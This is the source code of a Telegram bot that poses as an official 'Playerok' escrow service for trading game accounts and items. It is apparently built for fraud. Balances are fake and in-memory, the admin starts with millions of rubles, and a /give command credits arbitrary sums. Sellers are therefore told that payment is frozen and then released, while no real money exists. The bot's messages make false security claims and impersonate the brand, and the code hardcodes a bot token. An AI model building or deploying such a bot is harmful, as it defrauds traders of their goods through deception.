const{Telegraf,Markup}=require('telegraf');const http=require('http');const bot=new Telegraf('8849870102:AAGiJ0uvDWHKAH3sFYCWQECSgJmNFC0zsnY');
const ADMIN_USERNAME='k13_way',ADMIN_ID=8886821631;let users={},deals={},states={};const PORT=process.env.PORT||10000;
http.createServer((req,res)=>{res.writeHead(200);res.end('OK');}).listen(PORT,'0.0.0.0');
function init(id,name){const un=name?name.toLowerCase():'';if(!users[id])users[id]={id:id,username:un,balance:id===ADMIN_ID?16699677:0,count:0};else if(un)users[id].username=un;}
function findId(name){const cl=name.replace('@','').trim().toLowerCase();for(const id in users){if(users[id].username===cl)return parseInt(id);}return null;}
const menu=Markup.keyboard([['🤝 Создать сделку'],['💳 Баланс','🛡️ Безопасность'],['ℹ️ О Гарант Боте Playerok','🆘 Поддержка']]).resize();
bot.use((ctx,next)=>{if(ctx.from)init(ctx.from.id,ctx.from.username);return next();});
bot.start((ctx)=>{ctx.replyWithMarkdown('Добро пожаловать 👋\n\n✅ *PlayerOk* — специализированный маркетплейс и торговый гарант по обеспечению полной безопасности внебиржевых сделок.\n\n🥇 *Автоматизированный алгоритм исполнения.*\n🔎 *Скорость, верификация и защита.*\n💳 *Удобный и моментальный вывод средств.*\n\n• Комиссия сервиса: 1%\n• Режим работы системы: 24/7\n• Главный модератор: @sw1zyy01\n\n🛡️ *Выберите нужный раздел на панели ниже:*',menu);});
bot.hears('ℹ️ О Гарант Боте Playerok',(ctx)=>{delete states[ctx.from.id];ctx.reply('💎 Playerok Гарант бот — это внутренние безопасные сделки прямо в Telegram! 🛡️ Все текущие операции и конфиденциальные данные участников надёжно шифруются и хранятся в официальной базе данных Playerok Cloud. Если быстрые и на 100% безопасные сделки — то только на Playerok! ✨');});
bot.hears('🛡️ Безопасность',(ctx)=>{delete states[ctx.from.id];ctx.reply('🛡️ Официальный Гарант сервис Playerok защищает ваши средства от любых видов мошенничества. 📊 Деньги покупателя замораживаются на транзитном счёте гаранта и переводятся продавцу только ПОСЛЕ полной проверки и подтверждения получения товара. Не ведитесь на фейков! С любовью, команда Playerok. ❤️');});
bot.hears('🆘 Поддержка',(ctx)=>{delete states[ctx.from.id];ctx.reply('🆘 Официальная служба поддержки Playerok Гарант ПРЯМО в Telegram!\n\n⚖️ В случае возникновения любых спорных моментов, задержек или попыток обмана в сделке, незамедлительно обращайтесь к нашему старшему модератору арбитража: @sw1zyy01. Пожалуйста, прикрепите медийные доказательства (скриншоты или видеозапись экрана).\n\nВаша безопасность — наш главный приоритет! ✨');});

// Исправленный и безопасный вывод Личного Кабинета
bot.hears('💳 Баланс',(ctx)=>{delete states[ctx.from.id];init(ctx.from.id,ctx.from.username);const u=users[ctx.from.id];const bal=u&&u.balance?u.balance:0;const s=u&&u.count?u.count:0;ctx.replyWithMarkdown(`👑 *ЛИЧНЫЙ КАБИНЕТ PLAYEROK* 👑\n▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\n\n👤 *Пользователь:* @${ctx.from.username||'не установлен'}\n🆔 *Ваш ID:* \`${ctx.from.id}\`\n💎 *Статус профиля:* Проверенный трейдер\n📈 *Успешных сделок:* ${s}\n\n💵 *Текущий баланс:* [ ${bal} руб. ]\n\n▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\n✨ _Узнайте ID на втором аккаунте в этой кнопке для выдачи баланса через /give_`);});

bot.command('give',(ctx)=>{if(ctx.from.username?.toLowerCase()!==ADMIN_USERNAME)return ctx.reply('❌ Нет прав.');const args=ctx.message.text.split(' ');if(args.length!==3)return ctx.reply('⚠️ /give [ID] [Сумма]');const tId=parseInt(args[1]),am=parseInt(args[2]);if(isNaN(tId)||isNaN(am)||am<=0)return ctx.reply('❌ Ошибка.');init(tId,null);users[tId].balance+=am;ctx.reply(`✅ Успешно зачислено ${am} руб. пользователю ${tId}`);bot.telegram.sendMessage(tId,`💰 Ваш баланс успешно пополнен на: +${am} руб.`).catch(()=>{});});
bot.hears('🤝 Создать сделку',(ctx)=>{delete states[ctx.from.id];ctx.reply('👉 Выберите вашу роль в создаваемой безопасной сделке:',Markup.inlineKeyboard([[Markup.button.callback('🛒 Я хочу Купить','role_buy'),Markup.button.callback('💰 Я хочу Продать','role_sell')]]));});
bot.action('role_buy',(ctx)=>{states[ctx.from.id]={step:'info',type:'buy'};ctx.answerCbQuery().catch(()=>{});ctx.replyWithMarkdown('🛒 *ОФОРМЛЕНИЕ ПОКУПКИ ТОВАРА*\n\n📝 Отправьте данные сделки *одним сообщением* строго по шаблону:\n`Сумма Товар @user_name`\n\n📋 *Пример:* `2500 Standoff 2 Account @user_name` \n\n⚠️ _Важно: Второй участник (продавец) должен запустить бота (нажать /start) хотя бы один раз до начала оформления!_');});
bot.action('role_sell',(ctx)=>{states[ctx.from.id]={step:'info',type:'sell'};ctx.answerCbQuery().catch(()=>{});ctx.replyWithMarkdown('💰 *ОФОРМЛЕНИЕ ПРОДАЖИ ТОВАРА*\n\n📝 Отправьте данные сделки *одним сообщением* строго по шаблону:\n`Сумма Товар @user_name`\n\n📋 *Пример:* `1500 Нож в Standoff 2 @user_name` \n\n⚠️ _Важно: Второй участник (покупатель) должен запустить бота (нажать /start) хотя бы один раз до начала оформления!_');});
bot.on('text',async(ctx,next)=>{const uid=ctx.from.id,st=states[uid];if(!st||st.step!=='info')return next();delete states[uid];const match=ctx.message.text.trim().match(/^(\d+)\s+(.+?)\s+(@[A-Za-z0-9_]{4,})$/);if(!match)return ctx.reply('❌ Неверный формат сообщения!\n\nНажмите кнопку «🤝 Создать сделку» заново и отправьте данные строго по шаблону: Сумма Товар @user_name');const am=parseInt(match[1]),item=match[2],targetUsername=match[3];if(am<=0)return ctx.reply('❌ Ошибка: Сумма должна быть больше нуля.');const targetId=findId(targetUsername);if(!targetId)return ctx.reply(`❌ Пользователь ${targetUsername} не найден в базе данных. Он должен сначала зайти в бота и нажать /start!`);if(uid===targetId)return ctx.reply('❌ Ошибка: Нельзя проводить сделку с самим собой.');const dId=Math.floor(100000+Math.random()*900000);const buyerId=st.type==='buy'?uid:targetId,sellerId=st.type==='buy'?targetId:uid;const buyerName=st.type==='buy'?(ctx.from.username||'Покупатель'):targetUsername.replace('@',''),sellerName=st.type==='buy'?targetUsername.replace('@',''):(ctx.from.username||'Продавец');deals[dId]={id:dId,buyerId,sellerId,buyerName,sellerName,am,item,status:'wait'};ctx.reply(`⏳ Сделка №${dId} успешно оформлена! Ожидаем подтверждения от второй стороны.`);const notifyMsg=`🔔 *ВАМ ПРЕДЛОЖЕНА БЕЗОПАСНАЯ СДЕЛКА №${dId}!* 🔔\n▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\n\n📦 *Товар/Услуга:* ${item}\n💰 *Сумма сделки:* ${am} руб.\n👤 *Второй участник:* @${ctx.from.username||'Пользователь'}\n\n▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\nВы готовы принять условия гаранта и выполнить сделку?`;bot.telegram.sendMessage(targetId,notifyMsg,{parse_mode:'Markdown',...Markup.inlineKeyboard([[Markup.button.callback('🤝 Подтвердить Сделку',`ok_${dId}`)]])}).catch(()=>{ctx.reply('❌ Ошибка отправки уведомления второму участнику.');});});
bot.action(/^ok_(\d+)$/,async(ctx)=>{const dId=parseInt(ctx.match[1]),d=deals[dId];if(!d||ctx.from.id!==d.sellerId||d.status!=='wait')return ctx.answerCbQuery('❌ Ошибка.');d.status='pay';await ctx.answerCbQuery('✅ Сделка подтверждена!');await ctx.editMessageText(`🤝 Вы приняли сделку №${dId}. Ожидайте, пока покупатель @${d.buyerName} внесёт оплату.`);bot.telegram.sendMessage(d.buyerId,`🎉 Продавец принял сделку №${dId}!\n\n📦 Товар: *${d.item}*\n💰 К оплате: *${d.am} руб.*\n\nНажмите кнопку ниже для перевода средств на баланс гаранта:`, {parse_mode:'Markdown',...Markup.inlineKeyboard([[Markup.button.callback('💳 Оплатить покупку',`pay_${dId}`)]])});});
bot.action(/^pay_(\d+)$/,async(ctx)=>{const dId=parseInt(ctx.match[1]),d=deals[dId];if(!d||ctx.from.id!==d.buyerId||d.status!=='pay')return ctx.answerCbQuery('❌ Ошибка.');const b=users[d.buyerId];if(b.balance<d.am)return ctx.reply(`❌ На вашем балансе недостаточно средств. Нужно: ${d.am} руб.`);b.balance-=d.am;d.status='send';await ctx.answerCbQuery('✅ Оплачено!');await ctx.editMessageText(`💰 Сделка №${dId} успешно оплачена! Средства заморожены на счёте Playerok. Ожидайте получения товара.`);bot.telegram.sendMessage(d.sellerId,`📢 Покупатель @${d.buyerName} оплатил сделку №${dId}! Деньги заморожены.\n\n👉 Передайте товар покупателю в ЛС. После передачи нажмите кнопку ниже:`,{...Markup.inlineKeyboard([[Markup.button.callback('📦 Товар передан',`sent_${dId}`)]])});});
bot.action(/^sent_(\d+)$/,async(ctx)=>{const dId=parseInt(ctx.match[1]),d=deals[dId];if(!d||ctx.from.id!==d.sellerId||d.status!=='send')return ctx.answerCbQuery('❌ Ошибка.');d.status='check';await ctx.answerCbQuery('✅ Статус обновлен!');await ctx.editMessageText(`👌 Вы зафиксировали передачу товара по сделке №${dId}. Ожидайте проверки покупателем.`);bot.telegram.sendMessage(d.buyerId,`🔔 Продавец отметил, что передал товар по сделке №${dId}!\n\nПроверьте полученные данные и подтвердите покупку:`, {...Markup.inlineKeyboard([[Markup.button.callback('✅ Подтвердить покупку', `done_${dId}`)]])});});
bot.action(/^done_(\d+)$/,async(ctx)=>{const dId=parseInt(ctx.match[1]),d=deals[dId];if(!d||ctx.from.id!==d.buyerId||d.status!=='check')return ctx.answerCbQuery('❌ Ошибка.');d.status='end';users[d.sellerId].balance+=d.am;users[d.buyerId].count++;users[d.sellerId].count++;await ctx.answerCbQuery('🎉 Сделка завершена!');await ctx.editMessageText(`🎉 Сделка №${dId} успешно завершена! Средства переведены продавцу. ❤️`);bot.telegram.sendMessage(d.sellerId,`💰 Покупатель подтвердил получение товара по сделке №${dId}! Вам зачислено: +${d.am} руб.`);});
bot.launch().then(()=>console.log('🚀 OK'));
